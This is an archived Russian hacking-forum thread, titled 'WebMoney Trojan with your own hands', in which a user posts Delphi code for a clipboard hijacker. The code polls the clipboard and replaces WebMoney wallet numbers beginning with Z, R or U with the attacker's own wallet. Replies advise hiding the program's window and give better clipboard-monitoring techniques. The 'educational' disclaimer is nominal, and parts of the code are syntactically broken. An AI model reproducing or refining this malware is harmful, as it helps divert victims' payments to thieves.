1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.
    Скрыть объявление

WebMoney Троян своими руками

Тема в разделе "Pascal/Delphi", создана пользователем CraftR14, 28 июн 2010.

  1. CraftR14

    CraftR14 Новичок

    Регистрация:
    4 апр 2010
    Сообщения:
    38
    Симпатии:
    23
    Баллы:
    0
    Как то видел проги которые подменивают в буфере обмена текст для.... думаю сами знaете для чего

    Статья написана в чисто образовательных целях


    На форму кинем Timer назавем его Timer1

    Теперь в uses пропишем Clipbrd;
    он нам нужен что бы отслеживать наш буфер обмена.
    Поставь у таймера интервал в 1 миллсекунду, я думаю точно не прогадаешь)

    Теперь создадим процедуру обработчик Timer1.OnTimer (два раза клацни по таймеру)
    и впишем туда:
    Код:
    var s:string; //Объявим одну переменную
    begin
      s:=Clipboard.AsText; //Присаеваем "S" текст буфера
     if Length(s)=13 then //Если длина текста буфера равна 13 (длина номера кошелька) 
     begin //то начинаем проверки
       if Copy(s,1,1)='Z'  //если первый текст буфера обмена равен "Z" то 
    then  
    Clipboard.SetTextBuf('Z123456789 ©k0d.cc');  //Устанаваливам свой текст!
     end;
     if Copy(s,1,1)='R'  //если первый текст буфера обмена равен "R" то 
    then  
    Clipboard.SetTextBuf('R123456789 ©k0d.cc');  //Устанаваливам свой текст!
     end;
     if Copy(s,1,1)='U'  //если первый текст буфера обмена равен "U" то 
    then  
    Clipboard.SetTextBuf('U123456789 ©k0d.cc');  //Устанаваливам свой текст!
     end;
     ShowMessage('Будьте внимательны вас пытаются обмануть :)   ©k0d.cc 2010')
    end;
    Вот таким кодом можно подменивать буфер обмена




    ©CraftR14
     
    3 пользователям это понравилось.
  2. levsal

    levsal Новичок

    Регистрация:
    30 авг 2009
    Сообщения:
    3
    Симпатии:
    1
    Баллы:
    0
    задумка хорошая, только надо форму прятать. А оно не будит систему тормозить из-за постоянной работы таймера?
     
  3. CraftR14

    CraftR14 Новичок

    Регистрация:
    4 апр 2010
    Сообщения:
    38
    Симпатии:
    23
    Баллы:
    0
    Форму прятать? рофл а может лучше без формы вообще? :)
    снеси на хрен форму и все...

    если будеш делать про таймер
    там же идет обработка ЕСЛИ а если нет то не чего не делает да даже если ты будеш каждый раз в буффере фигачится с Z123456789012 R123456789012 то прога спокойно без усилий будет все делать.
     
  4. ~|~евто|-|

    ~|~евто|-| Silentium ..::V.I.P::..

    Регистрация:
    26 май 2007
    Сообщения:
    30
    Симпатии:
    377
    Баллы:
    0
    Кхм... Мои 5 копеечек...)))

    1. Copy(str, index, count), c случае "1, 1" чем-то предпочтительнее, чем str[1]? На мой не искушенный вкус, работает это куда шустрее, конечно, с учетом , что в начале идет проверка, что длина строки > 0. В данном случае 13...)
    2. Таймер это вообще вынос...
    RTFM, RTFM, RTFM (c)
    SetClipboardViewer и WM_DRAWCLIPBOARD
     
  5. CraftR14

    CraftR14 Новичок

    Регистрация:
    4 апр 2010
    Сообщения:
    38
    Симпатии:
    23
    Баллы:
    0
    да, есть много подходов :) можно вообще вырубить clipbrd и делать по другому , но думаю для обучения и этого хватит.
     
  6. lytgeygen

    lytgeygen pacifiste maniaque ..::V.I.P::..

    Регистрация:
    13 окт 2008
    Сообщения:
    431
    Симпатии:
    244
    Баллы:
    0
    CraftR14,
    лучше накатай полный пример работы с буфером, думаю куда полезней будет
     
  7. CraftR14

    CraftR14 Новичок

    Регистрация:
    4 апр 2010
    Сообщения:
    38
    Симпатии:
    23
    Баллы:
    0
    _http://programmersforum.ru/showpost.php?p=320998&postcount=2

    тут кое что есть _http://www.delphisources.ru/pages/faq/base/work_with_clipboard_like_bytes.html
     
    Последнее редактирование модератором: 29 июн 2010
  8. ~|~евто|-|

    ~|~евто|-| Silentium ..::V.I.P::..

    Регистрация:
    26 май 2007
    Сообщения:
    30
    Симпатии:
    377
    Баллы:
    0
    К чему эти ссылки не осилил... Поиск по слову SetClipboardViewer и просто Clipboard Delphi?
     
  9. CraftR14

    CraftR14 Новичок

    Регистрация:
    4 апр 2010
    Сообщения:
    38
    Симпатии:
    23
    Баллы:
    0
    нет :)
     
  10. Robo

    Robo ░░▒▓█▓▒░░ Модератор

    Регистрация:
    10 авг 2007
    Сообщения:
    301
    Симпатии:
    169
    Баллы:
    0
    С таймером конечно глупости )

    - Ну и что всподвигло тебя на эти глупости?
    - ... Маладой.

    Добавлено через 8 минут
    Вообще на статью не очень похоже...
     
    Последнее редактирование: 29 июн 2010
    1 человеку нравится это.
  11. CraftR14

    CraftR14 Новичок

    Регистрация:
    4 апр 2010
    Сообщения:
    38
    Симпатии:
    23
    Баллы:
    0
    Это всего лишь заметки
    какие глупости пфффф уже напишеш что нибудь так все б... мАлАдой пфф убиваете

    оке лучше не буду писать. а то опять что нить не так.
     
    1 человеку нравится это.
  12. rijy

    rijy Команда форума Админ

    Регистрация:
    5 авг 2006
    Сообщения:
    521
    Симпатии:
    224
    Баллы:
    0
    CraftR14, пиши) не слушай камрадов! (но прислушивайся:))
     
    1 человеку нравится это.
  13. CraftR14

    CraftR14 Новичок

    Регистрация:
    4 апр 2010
    Сообщения:
    38
    Симпатии:
    23
    Баллы:
    0
    крафтэ вернулсо с новой функцией)
    Код:
    function GetClipboardText(Wnd: HWND; var Str: string): Boolean;
    var
      hData: HGlobal;
    begin
      Result := True;
      if OpenClipboard(Wnd) then
      begin
        try
          hData := GetClipboardData(CF_TEXT);
          if hData <> 0 then
          begin
            try
              SetString(Str, PChar(GlobalLock(hData)), GlobalSize(hData));
            finally
              GlobalUnlock(hData);
            end;
          end
          else
            Result := False;
          Str := PChar(@Str[1]);
        finally
          CloseClipboard;
        end;
      end
      else
        Result
    
     
  14. san4ez

    san4ez Новичок

    Регистрация:
    26 мар 2011
    Сообщения:
    44
    Симпатии:
    4
    Баллы:
    0
    Как удалить форму ?
     
  15. Man777

    Man777 Новичок

    Регистрация:
    25 мар 2011
    Сообщения:
    23
    Симпатии:
    3
    Баллы:
    0
    На панели инструментов, жмете кнопку (с минусом) и названием "Remove file from project". Удаляете оттуда файл Unit1.pas, затем создаете модульный файл:
    File -> New -> Unit
    Сохраняете проект.
     
    1 человеку нравится это.

Поделиться этой страницей